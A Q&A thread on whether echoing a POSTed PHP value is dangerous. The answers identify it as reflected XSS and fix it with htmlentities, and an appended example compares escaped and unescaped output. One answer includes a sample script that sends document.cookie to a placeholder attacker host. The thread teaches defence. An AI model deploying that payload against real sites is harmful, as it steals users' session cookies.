2

I have a textbox in which a user inputs a value and a PHP script echoes it out. The Textbox is sent to the server via POST and is saved in a variable called Temp.

If I create the output script with the line below, will the echo prevent file inclusion or arbitrary PHP injection, assuming that no validation is being done?

<?php echo $Temp; ?>
SilverlightFox
  • 32,436
  • 11
  • 76
  • 145
  • Possible duplicate of [How can I prevent SQL-injection in PHP?](http://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php) – jjwdesign Feb 15 '16 at 21:15

4 Answers

2

mkaatman's answer may or may not address your question. JavaScript is client side, so there isn't any server-side maliciousness happening. If a user were to put something malicious in the text box that you echo back to them, they are only affecting themselves on the client side.

In other words, PHP is not going to execute what the user inputs in that variable if all you are doing is storing and echoing. No harm can be done to the server... and I think that was what you were asking.

Kyle Burkett
  • 1,375
  • 12
  • 28
  • I agree with you, but I think it's a good practice to use in these situations. – FareedMN Feb 15 '16 at 21:01
  • Have a look at this post on [Cross Site Scripting](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)). – SilverlightFox Feb 16 '16 at 11:38
  • @SilverlightFox points out that it's possible for one user to intentionally affect another user, but 'reflected Cross Site Scripting' is still only client-side and poses no threat to the server (so I still do not consider it a server-side vulnerability). PHP (the server) does NOT execute the code; only users' browsers execute the code. – Kyle Burkett Feb 16 '16 at 20:38
1

No. I could enter malicious JavaScript code in the input, and the browser would execute that code when you viewed the page that had been generated with <?php echo $Temp; ?>.

Matt
  • 5,315
  • 1
  • 30
  • 57
1

It's a typical XSS vulnerability (read more here). So always filter any user input right after you get it. PHP has nice type conversion like (string)$Temp and, as mentioned above, htmlspecialchars() and htmlentities().

1

This is a classic reflected Cross Site Scripting vulnerability. Injected code will not execute on the server.

A malicious user could setup their own site that POSTs to your form. The POSTed value could be something like

<script>
new Image().src = 'https://evil.example.com?' + escape(document.cookie);
</script>

When a user that is logged into your site visits the malicious page, the attacker will retrieve the user's cookies for your site (well, any that are not marked as HttpOnly). To mitigate this, do the following:

<?php echo htmlentities($Temp); ?>

which will display any script as HTML rather than execute it.

SilverlightFox
  • 32,436
  • 11
  • 76
  • 145
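The point made in Matt's and SilverlightFox's answers, shown as an added example that is not code from the question or from any of the answers: the unescaped echo from the question next to an escaped version, run against constructed input so the difference in the generated HTML is visible. The function names `render_unsafe` and `render_safe` and the sample values are assumptions made for this illustration; in the real script `$Temp` would come from `$_POST`.

```php
<?php
// Added example (not from the original question or answers): the unescaped
// echo from the question beside a hardened version, run against constructed
// input so the difference in the generated HTML is visible.

// What the question does: the POSTed value goes straight into the page.
function render_unsafe(string $temp): string
{
    return '<p>You entered: ' . $temp . '</p>';
}

// Hardened version: encode the value for an HTML text context before output.
// ENT_QUOTES also encodes single quotes, so the same helper is safe inside
// quoted attribute values; ENT_SUBSTITUTE replaces invalid UTF-8 sequences
// instead of returning an empty string.
function render_safe(string $temp): string
{
    $encoded = htmlspecialchars($temp, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p>You entered: ' . $encoded . '</p>';
}

// Constructed sample inputs (hypothetical; the real value is $_POST['Temp']).
$scriptInput = '<script>alert("reflected")</script>';
$phpInput    = '<?php echo "this never runs on the server"; ?>';

// 1. Reflected XSS: the unsafe page contains a live <script> element, the
//    safe page contains only text that the browser renders as the literal
//    characters "<script>...".
echo "Unsafe output:\n", render_unsafe($scriptInput), "\n\n";
echo "Safe output:\n",   render_safe($scriptInput),   "\n\n";

if (strpos(render_unsafe($scriptInput), '<script>') === false) {
    throw new RuntimeException('expected the unsafe output to contain a script tag');
}
if (strpos(render_safe($scriptInput), '<script>') !== false) {
    throw new RuntimeException('expected the safe output to encode the script tag');
}
if (render_safe($scriptInput)
    !== '<p>You entered: &lt;script&gt;alert(&quot;reflected&quot;)&lt;/script&gt;</p>') {
    throw new RuntimeException('unexpected encoding of the sample input');
}

// 2. PHP injection: echo writes the string's bytes to the response; it does
//    not re-parse them, so the "<?php ... ?>" text is sent as-is and is never
//    executed by the server. (It is still an XSS-style injection into the
//    page, which is exactly why the escaped version is the one to use.)
echo "PHP-looking input, unsafe output:\n", render_unsafe($phpInput), "\n";
if (strpos(render_unsafe($phpInput), '<?php echo') === false) {
    throw new RuntimeException('expected the PHP tags to be emitted literally');
}
```

Run it from the command line with `php example.php` and compare the two blocks of output: the first shows why the answers call the original line a reflected XSS bug, the second shows why none of them consider it a server-side code execution bug. `htmlentities()` as used in SilverlightFox's answer produces the same result for this input; `htmlspecialchars()` is shown here because it encodes only the five HTML-significant characters and leaves other UTF-8 text readable.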